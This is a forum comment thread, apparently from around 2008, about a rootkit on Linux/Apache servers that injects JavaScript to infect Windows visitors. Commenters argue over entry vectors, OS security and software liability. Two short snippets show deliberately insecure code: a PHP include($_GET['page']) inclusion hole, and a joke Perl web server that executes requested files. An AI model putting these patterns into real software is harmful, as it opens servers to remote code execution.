Re:Ubuntu as well?

[Skrynesaver]

There is no more powerful, nor easy to use, (with training), remote control tool for servers than ssh.

GUIs provide metaphors for users, they have no place in administration.

</grumpyOldFart>

Re:Ubuntu as well?

[Isauq]

Right, right, they're running your typical LAMP stack. You know, like most of the internet. Statistically speaking, if you have a site, you more than likely have a site served by Apache on Linux. In truth, I've heard of very few servers that receive significant traffic that DON'T run Apache and even fewer that don't run Linux. As the internet is based around open international standards, there's no reason a Linux-based server couldn't serve packets containing harmful windows executable code. Your first point is a non-issue.

As to your second point, it's only natural that windows machines be targeted. More critical security vulnerabilities as part of the base operating system that is almost certainly being run as root ("administrator" if you've never used *nix) means greater capability for general chaos. Alternatively, more useful machines for ye olde botnette. One problem with targeting Linux machines is the Unix permissions model that would create a situation where even if someone were to find a hole by which they could access the system, they would still need to find a method by which to elevate their user privileges to root so that they could accomplish more than manipulation of the user's home directory. This leads to the second problem- security flaws in a *nix system are almost certainly related to the software installed on them rather than the Linux kernel itself, making it a roulette game whether your particular method of attack is even present to be exploited.

In a system that has been systematically secured by experts from all callings for years on end, it becomes, with each patch level, more and more likely for the human equation's unreliability to be the single greatest point of failure. Being fallible, people resort to insecure data practices for their own convenience, out of laziness, from a lackadaisical attitude, or out of habit; thus creating a situation where the likelihood of a partial or full breach rapidly approaches one. This is a well known point of failure, and is even counted on, at some level, with a sane backup policy and data redundancy.

What's more, while rootkits and their dangers are very real, one cannot say that it is a vulnerability of a system that someone in possession of what is assumed to be a secure superuser password can install software on that system. Were you to steal the keys to a car, you certainly wouldn't find it strange be able modify the engine of said vehicle- after all, with keys you can unlock the door and with a minimum of effort pop the hood and go to work.

So yes, my dear Coward, grandparent was correct- this is somewhat more elegant than we're used to seeing, but it is most certainly presented in a way thst prompts one to think that there is something "wrong" with Apache or Linux.

Re:Wait a Minute!

[Secrity]

What malware are you speaking of? Do you know something about these servers that the security folks don't know?

Re:Ubuntu as well?

[Kwirl]

One great unknown thus far is how the servers come to be infected.

So as long as it defends your precious *nix community, and lays potential blame at the door of MS, it is perfectly acceptable practice to make accusatory conclusions with no evidence or proof. This kind of MS bashing just makes the *nix community look like desperate hypocrites, and only furthers my resolve to continue supporting the MS platform for another 15 years of satisfied usage.

Why can't you just accept the fact that everyone knows that every platform is vulnerable to some extent, and probably 90% of users don't give a shit.

Re:Ubuntu as well?

[sowth]

but can't we do better than a web-based program for this stuff?

It seems too many people can't wrap their heads around the idea that the internet / networking is more than just the web and http.

I understand the need for an easy to use remote admin tool

You mean like ssh and the X11 Windowing System? Yeah, you need the proper lines in ssh_config and sshd_config, (look in the man pages for 'X11') but after that, you can execute an X program remotely with little effort. 'ssh user@remotecomputer xload -rv' I've had trouble with OpenGL apps because ssh's forwarding doesn't support it, but that is the price of security. It does work if you drop privs with xhost and point your DISPLAY env to the X terminal, but that is dangerously insecure. ;-) Then again, who needs opengl apps to admin a machine?

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:Ubuntu as well?

[Ilgaz]

From TFA - "All reports thus far say the compromised servers are running Linux and Apache."

"And it only affects windows clients. So how is this problem not your typical someone cracked your machine? Oh wait, I smell Microsoft FUD"

Are you really that illiterate? Just an FYI - Microsoft doesn't make Apache OR Linux. If compromised severs are being used, it is certainly not the type that "only affects windows clients". Duh. Only here would such blatant anti-MS bullshit get modded "Insightful". I took a way more "insightful" shit this morning. So, Mac planet is not alone discrediting every single security alert as "FUD" :)

It seems there are other people who sees a story validated by 4 different, independent security companies as FUD. Apache is planets number 1 webserver and Linux is number 1 Webserver OS. What else would a blackhat supported by mafia would target? It is not like "I am proving Linux is unsecure", it is "I have purchased a previously unknown compromised account list and I am using it to infect millions of MS Windows users running popular but unpatched software, we will make millions from that zombie army".

I don't get why people gets defensive.

Re:Ubuntu as well?

[sowth]

From how I understood the article, they comprimized a few big hosting companies, which serve thousands of websites.

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:Funny

[Trogre]

Uhh, isn't your post the original definition of FUD?

Re:Funny

[Kalriath]

Protective curtain? Microsoft's website is behind the Akamai Content Distribution Network, which is nothing to do with security - it's all about protecting the network from being crushed by the millions of users who hit it every day (the average specs on a Microsoft.com server are: Age: 4 years, Home: Seattle, Washington -- Home of the Seahawks!, Processor Cores: Quad, MultiProcessor: 4, Memory: 16 GB, Internal Drives: 8, Height: 4U - source: http://blogs.technet.com/windowsserver/pages/about-lone-server.aspx)

Re:Ubuntu as well?

[hostyle]

This is old news. Its caused by a rootkit: http://www.cpanel.net/security/notes/random_js_toolkit.html

Re:Funny

[Miseph]

Lawyers in general are only class-restricted to lawful. Certain prestige classes which are extensions of the lawyer class (see: Corporate Counsel, *AA Fiend, Politician) are further restricted to lawful evil, but there certainly exist lawful good examples (see: Civil Rights Advocate, EFF Volunteer), and a vast number of lawful neutrals as well (see: Probate Drone, Public Defender).

Re:Ubuntu as well?

[Spazmania]

On the other hand, allowing folks to log on to root directly from a remote console is begging to be hacked. Even telnet didn't allow that.

Re:Funny

[makomk]

Actually, the reason it's only Apache+Linux servers is that, once they get in (apparently via a root login over SSH, from what people are saying), they install a Linux kernel rootkit that modifies Apache's request handling - the payload is Apache+Linux only, but the exploit may not be. People have tried to find further things the infected systems have in common, but failed - though apparently several of them saw a root SSH login that shouldn't be there in the logs.

Re:Ubuntu as well?

[budgenator]

As Ubuntu is indeed Linux, I'd venture to guess that it is affected.
UBuntu is a Debian derived distro so it's likely not to be affected, or they may just be lucky and haven't a lot of penetration in the commercial server market.

Targeted Systems
A Linux server virus has recently been reported targeting multiple platforms such as: RedHat Enterprise, Centos v4.x/v5.x, and Fedora Core v5/v6. This Rootkit is not believed to be specific to any one control panel and/or Php application(s). Unfortunately, there are still many unknown details. Malecious random JS Rootkit

As you may note all of these OS's are Redhat based Linux, but it's also thought that the initial penetration is through social engineering, i.e. root password leaked, rather than an OS vulnerability but time will tell.

Re:Ubuntu as well?

[PrescriptionWarning]

Yes you hit precisely what I was getting at, while I do fear i came off as being an anti-MS zombie, my point was that the title of the story and the article seem to directly imply Apache is at fault, when in fact it is *most likely* the result of someone using Apache to infect Windows. Wording it seems was against both of us.

Identified about 5 months ago

[fmavituna]

I identified this rootkit in a system about 5 months ago and slightly documented some behaviours of it (I think only behaviour I've missed was numerical directory thingy). Related blog post 25.08.2007 - http://ferruh.mavituna.com/makale/exploit-paketleri/ ).

There is one more thing to add, it modify all valid HTTP responses, add .js after body tag in all interfaces. There was one article that mentioned most of the compromised servers based UK, it was same for me. And considering it's been about 5 months, I assume UK websites were prime target in the start.

Re:Ubuntu as well?

[budgenator]

What that means is that probably every server in the data center had the same root password and somebody leaked it or sold it. We had a server that was managed by command dental system, and every system they sold had one of 5 root passwords which quickly became common knowledge in the industry.

Re:Ubuntu as well?

[Sillygates]

on several systems, in a small amount of time?
In general, these systems probably don't even give users shell access, and even then, password cracking is probably out of the picture. And brute forcing a password over ssh? thats probably troublesome too, it would be hard to get over about 50 attempts/second.

On the other hand, there are a whole bunch of local vulnerabilities that can be exploited, after a system is compermised. In some cases, a weak php include vulnerability could potentially allow the apache user to execute suid root applications through such vulnerabilities as: https://rhn.redhat.com/cve/CVE-2007-5964.html on a default configuration of rhel5/fedora5-7.

Every system has it's vulnerabilities.

Re:Software sucks.

[budgenator]

Any software company that isn't in the fortune 500 won't even be able to consider entering the market.
Seems perfect for small disposable companies to me, it's not like IBM or Novel is going to get anything from SCOX.

Re:Funny

[Niten]

Except IIS had security hole after security hole.

That's a lie. I mean, ten years ago, maybe; but IIS today is pretty damn secure by anybody's standards.

Where are all these vulnerabilities that you insist exist in IIS, from any time during the last five years? OSS FUD doesn't smell any better than Microsoft FUD.

Re:Ubuntu as well?

[Sillygates]

In fact, I mentioned it in my initial bug report on 12-5-07 ;-): https://bugzilla.redhat.com/show_bug.cgi?id=410031

The same issue is likely to affect a huge number of services, like apache (with a rogue user using their personal webpage, or a remote attacker exploiting php code injection in poorly written php code).

Re:Wait a Minute!

[Fri13]

Yes, i would like to know what malware it is, someone has a inside information?

sshblack

[vivin]

I use sshblack on my FreeBSD machine.

Re:Software sucks.

[tubapro12]

If that were done, all DIY/open source programming would be dead as the only people who would be able to afford the liability risks would be the big companies like Microsoft. I know I'd certainly stop releasing my FOSS software if I couldn't claim "No liability".

So much for the myth that Linux cannot be infected

[Orion+Blastar]

with malware because Linux is a hostile environment.

Unix systems can be infected, like the original Arpanet worm that Robert Morris Jr. was accused of writing that infected Sendmail Unix servers.

I had run a Linux server in the past for my web server and I noticed things like that which forced me to reformat the system because Linux was acting funny with directory names and log files kept being deleted for no reason, to hide the malware infections and/or hacking attempts.

Re:Ubuntu as well?

[The_Wilschon]

You mean like ssh and the X11 Windowing System? Which is slower than a thing which is very very slow.

Re:Breaking news--CERT has uncovered mkdir hack

[sticks_us]

I gotta confess--I'm a little dismayed this code snippet (how many of those do you see around here lately?) got modded down--as a troll, no less! This (working) example uses actual mkdir.c source code, and it was with great care that I crafted the "novelty" portion. Its reference to a popular frist prost style of comment was actually intended to be a parody--a puckish satire--of the whole genre.

Perhaps the point of the joke was too subtle. TFA made it sound like there were actually malicious individuals out there intent on rooting your box and replacing mkdir with an oddly quirky and ridiculously hobbled version--to what end, nobody knows. The example above was intended to illustrate the idiocy of the notion, and thus derail the entire fools' errand that comprises the paranoid schizophrenic who fears miniscule modifications to mkdir.

Re:So much for the myth that Linux cannot be infec

[brezel]

with malware because Linux is a hostile environment.

Unix systems can be infected, like the original Arpanet worm that Robert Morris Jr. was accused of writing that infected Sendmail Unix servers.

I had run a Linux server in the past for my web server and I noticed things like that which forced me to reformat the system because Linux was acting funny with directory names and log files kept being deleted for no reason, to hide the malware infections and/or hacking attempts. sorry but this really doesn't sound like you knew what you were doing.

Re:Software sucks.

[Kadin2048]

The way such a scheme would pan out is that, almost instantly, nobody would sell you software unless you first signed a waiver of liability / hold-harmless agreement with respect to the software, and/or they gave you a list of known problems that was six feet long.

The market is full of buggy software because nobody wants, apparently, to pay for really good software. You could get it, if you wanted to pay for it. You could get a webserver that came with some sort of bond-backed guarantee that it didn't have any common types of bugs (you probably can't guarantee no design flaws, but you could guarantee against certain types of technical defects). It would probably cost a staggering amount of money, though. Like nobody-but-the-DoD kind of staggering. (In fact, even the DoD doesn't pay for that level of quality assurance. They're big into the CMMI and other structured methodologies, but there's less of an emphasis on mathematical proofs of bug-free code than perhaps some Slashdotters would like to imagine.)

I hate mediocrity as much as anyone, but that's what people want. If people wanted reliable software, we'd all be using OpenBSD on our desktops and using mainframes for servers. People use Windows (and lots of other mediocre software), despite it being an utter piece of shit, because it works just well enough to get the job done. That's all they're interested in paying for.

What I'd like to see is a legal and social change to stop making "the computer did it" an acceptable excuse for anything. If you choose to employ crummy consumer-oriented software and use it for business, and your consumer-grade system craps itself, tough. Guess you should have spent the money up front for something better. The fact that crummy software exists isn't the problem; the problem is that people continually cut corners and use crummy software in totally inappropriate places (like to manage critical infrastructure, for financial systems, etc.). I think the problem needs to be approached from the demand side, not the supply/development side.

Re:Software sucks.

[marcello_dl]

Then go buy software which gives you such guarantees, and see the market decide if your installation is to be preferred over lower cost- no guarantee ones that competition might use. But posting your opinion about liability on an Apache/Linux comment thread is off-topic. See apache license

      8. Limitation of Liability. In no event and under no legal theory,
            whether in tort (including negligence), contract, or otherwise,
            unless required by applicable law (such as deliberate and grossly
            negligent acts) or agreed to in writing, shall any Contributor be
            liable to You for damages, including any direct, indirect, special,
            incidental, or consequential damages of any character arising as a
            result of this License or out of the use or inability to use the
            Work (including but not limited to damages for loss of goodwill,
            work stoppage, computer failure or malfunction, or any and all
            other commercial damages or losses), even if such Contributor
            has been advised of the possibility of such damages.

Related to Fasthosts Breakin

[caller9]

"Last week, ScanSafe's Landesman drew a link between the security breach at UK-based Fasthosts and the site hacks, saying then that the domains ScanSafe had found infected had, or had recently had, a relationship with Fasthosts."

http://www.techworld.com/security/news/index.cfm?newsid=11184

It's not a software flaw according to Landesman. Its stupid admins not changing passwords or with a lingering delayed infection from the initial theft.

Re:Related to Fasthosts Breakin

[caller9]

Damn, I should've read further "Friday, Landesman said more data during the week had made her change her mind about the link to Fasthosts. "There are a great deal more of these [compromised] sites than earlier," she said. "There are a number of them that can be traced to Fasthosts, but not all of them do."" (same article)

I had remembered the previous claim without the new clarification. Still it looks like an inside job at least originally. Also, what would prevent a server moved from Fasthosts to a new hosting company from spreading the infection to poorly secured/pached servers on the same internal vlan assuming a "crunchy on the outside, soft in the middle" approach by the new hosting company.

It still sounds like the root of the problem was the breach at Fasthosts, but it's all conjecture on my part at this point. I'm posting it anyway cuz it's the intarwebs, and that second quote exonerates Fasthosts somewhat.

This thousands of hosts number being bandied about includes a majority of mom and pop online stores mainly in the UK right?

Re:every single industry...

[bob.appleyard]

I totally agree with what you're saying, although does have implications with regard to free software. Say I write a really snazzy piece of software that has no bugs whatsoever (a hypothetical). I release it under some free software license. Someone else takes that, and makes some other snazzy software with it that does have bugs. If something breaks down with that system, who's liable?

What

[springbox]

Huh? This reminds me of the incident where our mother in law asked a group of us if we were high because she seriously thought we were "laughing too much."

Re:Software sucks.

[deep-deep-blue]

Is it possible that this would be a hardware (CPU) exploit ? I ... I am a sw developer ...

Re:Software sucks.

[cbart387]

If people wanted reliable software, we'd all be using OpenBSD I was on freeBSD for a brief stint but found myself working harder than I wanted to, to get the system fully set up (whereas Fedora is much more 'user friendly'). I do have to say though that there's a particular piece of software that worked pretty well on freeBSD but crashes on Fedora. I may switch back to a BSD, for that reason, when I don't need a system running for school. Is openBSD the OS that you run (since you mention it in your comment)? Also, I am aware that there are distros of BSD like desktopBSD that have a window manager already included ... which may be a route I'd go.

Re:Software sucks.

[caller9]

Not arguing with the fact that people agree to that license. However, I only agree with that up to the point of "even if such Contributor has been advised of the possibility of such damages." Even Civil Engineers have better ethics than that. See Canon 1.1-4. Heck read 'em all. https://www.asce.org/inside/codeofethics.cfm

What that line suggests is that, even if they knew it was a problem, Big Dig engineering firms in Boston would've kept plugging along cutting corners until someone got hurt...oh...they did eh? Well...Oh..I see.

So...does anyone have any honor anymore?

I can understand safeguarding developers from liability for accidental goofs, but blanket free-pass for intentionally including weak code should be actionable. That same sentence quoted above (quite a legalese-paragraph-sentence too) would exonerate someone who intentionally put a hidden back door into the apache source using security through obscurity... you know... for security updates, and was told it was a stupid idea.

The upswing is that the peer reviewed, engineered, open nature of Apache would prevent something like that from living too long. I could see issues with people using the same license on lesser software though.

Re:zOMG, THE FOSS!!!11!!

[Hucko]

Wus. I want more baby, Ooh yeah! You know I love it!

Re:every single industry...

[Hucko]

Having thought carefully about this most serious question for extremely small values of a commonly used and often quoted measurement of time, I have carefully arrived at the conclusion that I would have to go with the latter developer of said secondary software.

Re:Funny

[spitzak]

Stolen password would be a vector into Apache servers on other platforms as well - but the reports so far seem to be saying it is just Apache + Linux servers.

That's because the rootkit is Linux-only. Duh.

The attackers are either only targeting Linux machines because they have a rootkit for them, or they are using different techniques on other machines so nobody has noticed that they are the same attackers.

Re:Funny

[spitzak]

I was about to say that you only need access to the webserver to be able to send the compromises to clients, but that probably would not be enough to install a rootkit. So it does sound like they have stolen root passwords, though it is possible a local exploit. Or the machines were setup with the webserver running as root?

Horseapples.

[jnelson4765]

That's not new - Fedora Core 1 servers running cPanel handed out to "admins" who load it up with phpBB and never update it host a fair bit of crap. We've migrated customers off of those boxes, and it's always fun to check every single file you bring over to make sure there's no surprises.

On the last server compromise I had to clean up (php site, not updated - standard story), I spent some time going through the logs to check what other sites they'd used this thing as to springboard into other machines. It was a fair collection of blog servers, bulletin boards, and a few company sites. When I could locate a phone number, I would give them a call. Not a single one of the admins knew their boxes were hosting malware. A couple boxes had been replaced after whoever got in wrecked the site, but the vast majority were running just fine, just with a '.../' directory hanging off the web root.

Personal comments on OBSD, Linux, etc.

[Kadin2048]

I use OpenBSD for Internet-facing applications where I want security, e.g. the DMZ box on my home network that I want to be able to SSH into from the outside world. I really like OpenBSD conceptually, and happily send them my $60 or whatever it costs for a DVD with each major release, although I wish the pool of officially vetted software was bigger. (*cough* POSTFIX *cough*)

Because I use it for gateway/edge machines, I don't build the ports tree or use any software that's not part of the official system. This is pretty limiting and definitely not something you'd want to do if you were using it as a workstation. (OpenBSD has two kinds of software: officially-supported stuff, where somebody has combed through the code and generally locked it all down, and unsupported/unofficial 'ports,' which are installed slightly differently and haven't necessarily received the same level of attention.) There's definitely enough officially-supported OpenBSD software to run a basic server (mail/web/DNS) without going to ports, but you may not have the level of choice you're used to in, say, Debian Stable.

In fact although there are lots of people out there who run OpenBSD as a workstation OS, I'm not really sure why you'd want to (instead of one of the BSDs that's geared more towards that as a primary function). I could see the security benefits potentially coming into play if it was a laptop, and the code is very clean with an emphasis on technical 'correctness' (so it might be a good OS to run if you want to really understand what's going on inside your computer), but there are other options which are equally or more attractive for a pure desktop system. That's just my gut feeling; I'm sure there are other people who'd say differently and I certainly wouldn't argue with them.

Personally, I run either Mac OS X or Debian on my workstation/firewalled PCs. The Macs are mostly just out of inertia and the Debian machines are because I like apt-get. While there's no doubt in my mind that OpenBSD is the more technically correct, better designed, better documented, and less defect-prone system, it's not quite enough for me to switch over my day-to-day PCs. I am, I suppose, proof of my own assertion in my earlier comment.

The BSDs are pretty fascinating, and I think if I were starting with a clean slate today, without all the legacy applications and data and personal biases that I have, I'd probably look very seriously at one of the desktop BSD distros. Particularly if you're a student, there's something to be said for using a system that at least plays lip service to doing things 'right.'

One note regarding OpenBSD: if you do decide to play with it, you may want to avoid 4.2 and opt for 4.1 instead; 4.2 requires that you install X11 in order to run many packages that should not require X11 (server software), because of some dependency issues. This is supposed to be corrected in 4.3. Of course, if you're creating a workstation OS and plan to install X11 anyway, this is a moot point, but it's something to note if you're going to play with it on a server or headless box using the CLI first (which isn't a bad thing to do).

Re:Personal comments on OBSD, Linux, etc.

[jonadab]

> In fact although there are lots of people out there who run
> OpenBSD as a workstation OS, I'm not really sure why you'd want to

Same reasons you choose any other distro for your workstation. You want to become more familiar with the system, so that when you use it on servers you'll be more knowledgeable about what you're doing. Doesn't everybody choose their desktop OS that way?

What? Stop looking at me like that.

Re:Ubuntu as well?

[AySz88]

GUIs provide metaphors for users, they have no place in administration. I'm of the opinion that one should eat one's own dog food as much as possible - if you're providing GUIs to users then you should be working in that sort of environment. It helps one learn how the user thinks.

Re:Funny

[Knuckles]

Kind of. But when running proprietary software you just have to live with uncertainty and doubt.

Re:Ubuntu as well?

OK, just so we're clear on this, Windows is insecure because Quicktime and Yahoo Messenger have vulnerabilities that allow a remote attacker to run software on the computer?

Good, just checking.

dom

Re:Ubuntu as well?

[schmutze]

Linux desktop users most certainly can be infected with this rootkit. We've seen 4 machines with it so far- 1 server and 3 desktops. The Apache webserver may be being used to infect windows clients with malware, but it is not the point of entry for the rootkit installation.

Re:Ubuntu as well?

[grahamm]

"the current thinking is that the malware authors gained access to the servers using stolen root passwords" Could this be what one of the (all too common) SSH probes does if it actually manages to connect?

Re:LISTEN UP

[Jesus_666]

GOD DAMNIT! How am I becoming old?

I'd blame the passing of time.

Re:Ubuntu as well?

[ThePromenader]

Both the above and grandparent have a point. Remote management GUI's are potential targets - but users need GUI's.

Administration work should really most safely be done through a monitor and keyboard plugged directly into the server, and any gui-like access/interface should only exist on the administrator's computer. Yet would it still be safe to manage a computer ~remotely~ if the gui existed only on the administrator computer?

This would mean setting up ~minimal~ GUI's for those web-users - meaning mail access, (sub)domain management, etc. - a lot of work for someone.

Re:Ubuntu as well?

[DrSkwid]

I auto block any IP trying to log in as root so I like ssh probes, keep 'em coming, ta.

Which will be first?

[PinkyDead]

The Microsoft Ad Campaign denouncing the evils of open source or the Linux Patch fixing the problem?

Re:Funny

[jimicus]

Another thing I've seen mentioned is that the majority of compromised hosts seem to be in hosting companies.

I wonder how many hosting companies always configure customer systems with the same root password per default? Because I'll bet there's at least a handful. And of those, a number of customers probably don't bother to change the root password - particularly if it seems like a reasonably secure password.

Of course, the password is drastically less secure if it happens to be the same for 40% of the hosts in a particular IP block - because you only need one idiot admin and then everyone's compromised.

Rooted or Gained root access

[jonoton]

There is a bit of a difference.

In the article they are speculating that the vector may have been a root password compromise. There are several ways of getting at this, it could be a weak password, it could be a brute force attack against an obtained password file, it could be social engineering.

You'd be surprised how many weak root passwords there are out there, my home machine was recently the victim of a dictionary attack (my own stupid fault - weak password on a seldom used account got compromised). They did not get root, I've run forensics on the compromised disk however it was still used to scan other machines for ssh access. I found and stopped it within 12 hours, but in that time it had found over 30 machines it could SSH into including one with the root password 'root'.

There is no technical solution to poor administration, a well maintained Windows system will be more secure than a poorly maintained Linux system.

Re:Software sucks.

[Mark+Trade]

If you don't like the quality of free (as in beer) software that you can do everything you want with, just switch to some proprietary product and stop whining OR start contributing to the projects you complain about. It's not like you are forced to use that stuff.

Re:Should have used IIS: Windows Vulnerabilites

[dwlegg]

I read else where that the passwords to the Apache servers were stolen: Hardly a vulnerability, just careless by somebody. The vulnerable machines are the Windows boxes that are getting attacked successfully. Same old story, really.

Re:Ubuntu as well?

[SgtChaireBourne]

If the current thinking is indeed that the Linux servers were inappropriately accessed through stolen passwords, how is that a security flaw of Linux or Apache? Like he asked, how is using a legitimate password equal to cracking the server?

On the other hand, turning Windows clients into bots *IS* an example of that software's (and QuickTime's and Yahoo! Messenger's) insecurity and vulnerability! Using a legitimate password is not equal to cracking the server. But it must be made to look so because the PR firms the M$ movement uses must cast aspersions on Apache and Linux so as to draw attention away from the actual insecure and vulnerable system. Most PHBs never read past the headlines, so this is major spin for the M$ party.

Re:Ubuntu as well?

[WWWWolf]

There is no more powerful, nor easy to use, (with training), remote control tool for servers than ssh. GUIs provide metaphors for users, they have no place in administration.

While SSH allows for direct neural link that allows the computer to do exactly what you think, thus bypassing the metaphors and concepts entirely? Man, I thought SSH didn't do that by default, at least not on my Linux systems; it just provided a secure connection to whatever user interface the system provided. So, where can I download DO-WHAT-I-MEAN-OSIX 2.0? =)

Command lines are a metaphor. Yes, incidentally well suited for system administration, but a metaphor nevertheless. =)

Re:Software sucks.

[marcello_dl]

The license covers contributors asses, hence the wording. I'd not like somebody mounting a class action because of a stupid mistake that can be interpreted as mischief (for example, if I leave my domain as a log target in a production app, then whatever tests will pass, I'll be satisfied, commit the changes, and will have effectively inserted something that in court can be defined spyware. Do you trust judges to understand your position?)

I agree it doesn't sound particularly good for the customers. But then, even debian first thing is guarantee disclaimer which sounds terrible. Once you try out the distro on supported hardware you quickly change idea.

Re:Funny

[Gimble]

Not exactly hole after hole, but there was one remote vulnerability midway through 2006. See the Secunia advisories.

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:Funny

[The_reformant]

Not yet....but good point.....im off to patent a lock which beeps if you leave your keys in it for longer than a preset time interval.

Re:Funny

[plague3106]

Well, the mono-culture also makes development costs lower, although its not really a mono-culture either. IIS is not the same on Win2k Server as it is in 2k3, or 2k8. Most of the recent exploits are also configuration problems, much like using a weak password.

Mono-cultures do provide benefits as well as risks, just like everything else.

Re:Breaking news--CERT has uncovered mkdir hack

[sticks_us]

Thanks for the validation. Next time I'll do a petrified natalie portman with hot grits.

bless() you...whoever you are.

Re:Ubuntu as well?

[ale_ryu]

Mr Gates, don't get mad, it's just a comment!

Jumping to conclusions (as usual)

[cwells]

Does anyone have proof that root was achieved through an Apache exploit?

Re:Ubuntu as well?

[Alex+Belits]

Who are "we" and what the Hell are you talking about? The article doesn't even mention a particular vulnerability, and you already identified it on four boxes (I assume under your control, because seeing a random server on the internet with malware on it is hardly a notable occurrence)?

Re:Funny

[afidel]

I'm not sure why this is marked funny, it's technically true. There was ONE remote hole if you have ASP turned on (fairly common) and one with the admin page (stupid to turn on). That's since 2003, I'm sure Apache has had at least that many in the same timeframe (not sure since I don't herd Apache servers). IIS was a joke before Windows 2003/IIS6 but MS really learned their lesson and did it right this time.

You're thinking too small.

[argent]

I don't think mapping group ID directly to port is a good idea. For one thing, it's not generally extensible to other numeric domains. You should map permissions on an object visible in the file system to access to the port. Ideally, this would be handled by replacing crazy overlaid in_addr objects with filenames.

That is, instead of calling socket and bind and so on, you'd call 'sock = open("/net/tcp/listen/25", O_RDWR)'. Normal file system protection on /net/tcp/listen/* would provide access control. Similarly, to make an outgoing connection, you'd call 'sock = open("/net/tcp/connect/10.0.0.2/25", O_RDWR);'. You wouldn't need to modify your code to connect to IPV6 or even OSI TP4/CONS or DEC LAT ports... or UNIX domain sockets... or named pipes...

The whole Berkeley Socket design is second only to System V IPC in terms of missing the whole point of UNIX.

Re:You're thinking too small.

[thogard]

i think the point is to think small here... the idea is to allow the smallest set of changes that work to kernels and code that still works and increases real security. The patch I mentioned works well with most open source programs that don't have code like if(uid!=0) winge(must be run as root) when they should have been if(bind()==FAIL) {winge(must be run as roo)}. My early tests with this showed that it worked great for bind, most mtas, web servers (that don't run cgis as their users but thats a different mess). Sure its not the best way but it doesn't break anything (that at least one unix systems hasn't broken already) and it kills the number one reason for setuid code.

Re:You're thinking too small.

[argent]

i think the point is to think small here... the idea is to allow the smallest set of changes that work to kernels and code that still works and increases real security.

That's how we got in this mess in the first place.

There's a better patch that's even simpler, and that is quit pretending that restricting ports is a useful security feature in the first place.

In FreeBSD, that's done with "sysctl -w net.inet.ip.portrange.reservedhigh=0". I'm sure there's an equivalent in Linux.

That has the advantage that it's OS independent and it doesn't break existing installations that are already using groups for other things. The "reserved port" model made sense when computers that had network interfaces and could run IP were expensive, and access to a LAN required physical access to secure areas, but it's long since become little more than an annoyance.

Re:Funny

[studpuppy]

My attorney says your EULA is unenforcable, and I should ignore it.

--

And then he handed me a bill for 1 hours' work... wish I could get away with that

Re:Ubuntu as well?

[sowth]

Slow as compared to what? A webpage with tonnes of javascript? Hardly. X11 will certainly work better than some web based crap. Obviously if the programmer would write remote admin tools to work over the internet in the first place, it would work worlds better, but apparenly no one is interested in doing that...

Then again, I blame MS, since they want to make it so everyone has to pay some guy $50(US) for a simple program any second semester CS student could write, just because the guy took some MCSE classes and paid thousands of $$$ just for the rights to link to some library, and soon they'll probably have to pay thousands for a key too. And of course no one in the MS world will accept downloading Python or Java, so non-MS solutions for Windows users is "unacceptable". Not to mention Microsoft's poor design practices make it so everyone is afraid to download anything which may be called a program. Don't forget their tactics made everyone think there can be no such thing as standard protocols. Wonderful. Parasitic business models make everything work so well.

Re:Bad PHP Code

[FlyingGuy]

OMG!!!!!!

I would never even remotely entertain the notion of something like that. I mean it just LOOKS suicidal!

Thanks for the reply.

Re:Bad PHP Code

[FlyingGuy]

Wow! As I replied to the other person who replied back to my question, that looks suicidal. I cannot for the life of me see any reason to pull scripts from a remote machine. I have seen a lot of JS pulled from remote machines and even that makes me really scratch my head and wonder what those people are thinking. I would seem you are asking for one huge ass heap of trouble doing anything like that. I use the include statement quite often but its always to a directory outside the webroot, and very specific permissions limit that directory to RO. Yikes, it looks like a combination of lazy / clueless.

Re:Ubuntu as well?

[Tanktalus]

I use perl -MIO::All -e 'io(":80")->fork->accept->(sub { $_[0] < io(-x $1 ? "./$1 |" : $1) if /^GET \/(.*) / })' as my webserver you insensitive clod!

(I ripped it from the IO::All documentation. That's gotta be secure, right?)

Comment removed

[account_deleted]

Comment removed based on user account deletion

Give a $hit, guy.

[reiisi]

System security aside, the idea that 90% of users don't give a shit, and that's okay, is the whole problem here.

But users who do care don't use MSWindows.

And you, who expect another 15 years of "satisfaction" don't seem to understand why.

situation normal, all fouled up, business as usual, let's make some more money.

software liability

[reiisi]

I'm with you on software liability, iff Micro$oft leads the list of liable entities.

Because, in fact, they do. They pushed the internet to the public before it was ready. Everybody else who did that understood the dangers pretty soon and backed off. Bill and Steve picked up the ball and run. Didn't seem to realize they were running towards the wrong goalposts, maybe, or maybe they just knew the fan club of the opposing team was willing to reward them richly.

Re:Ubuntu as well?

[Crayon+Kid]

Ah, careful with the terminology there. Brownware is an already established term.

Re:Ubuntu as well?

[Crayon+Kid]

It seems there are other people who sees a story validated by 4 different, independent security companies as FUD.

Yeah, well, when it's likely the reporters are deeply biased please excuse us if the knee-jerk reaction is to cry "FUD!"

Most of today's security companies have a business model that can only be called parasitic. They depend on the deeply flawed way of thinking pushed by the ubiquitous Windows operating systems. You know which: default allow, blacklisting, turd polishing etc. More here.

It is damn obvious that these security companies have all the interest in trying to sell anti-malware products to platforms such as Mac and UNIX/Linux, even though their security approach is very different ("by design" instead of "trial and error") which makes such products mostly redundant. Not to mention the efforts of the likes of Microsoft to discredit these competing platforms.

I haven't seen a single shred of evidence so far in this story. The whole thing is basically a hoax so far. "Yeah there's something out there but nobody has evidence and there's no common denominator." If that's not FUD I don't know what is.

Re:Ubuntu as well?

[Crayon+Kid]

[..]and every system they sold had one of 5 root passwords which quickly became common knowledge in the industry.

Ah yes, I know those five passwords: "123", "aaa", "123aaa", "qwerty" and "password". And if it wasn't one of these then it was probably on a post-it note on the system case.

Re:Ubuntu as well?

[Crayon+Kid]

Which brings us to a much more pertinent question: have those targeted vulnerabilities (in Quick Time, Messenger etc.) been fixed? Is the fix available?

Re:Ubuntu as well?

[zerkon]

#/etc/ssh/sshd_config

PermitRootLogin no

Easy enough to fix, coupled with sudo it's how all my machines are run.

Re:Ubuntu as well?

[The_Wilschon]

Slow as compared to what? A webpage with tonnes of javascript? Hardly. X11 will certainly work better than some web based crap. Not in my experience. Perhaps you will tell me that something was simply set up poorly, but I'm quite accustomed to waiting on the order of minutes for a single click to travel from my X server to the machine running the client and then for the client to do something, and send back a visible update. javascript/AJAX apps are not even in the ballpark of that bad.

Re:Bad PHP Code

[erayd]

Indeed. Thing is, your app can be vulnerable to it without realising - there are plenty of bad apps that simply do something like

include($_GET['page']);

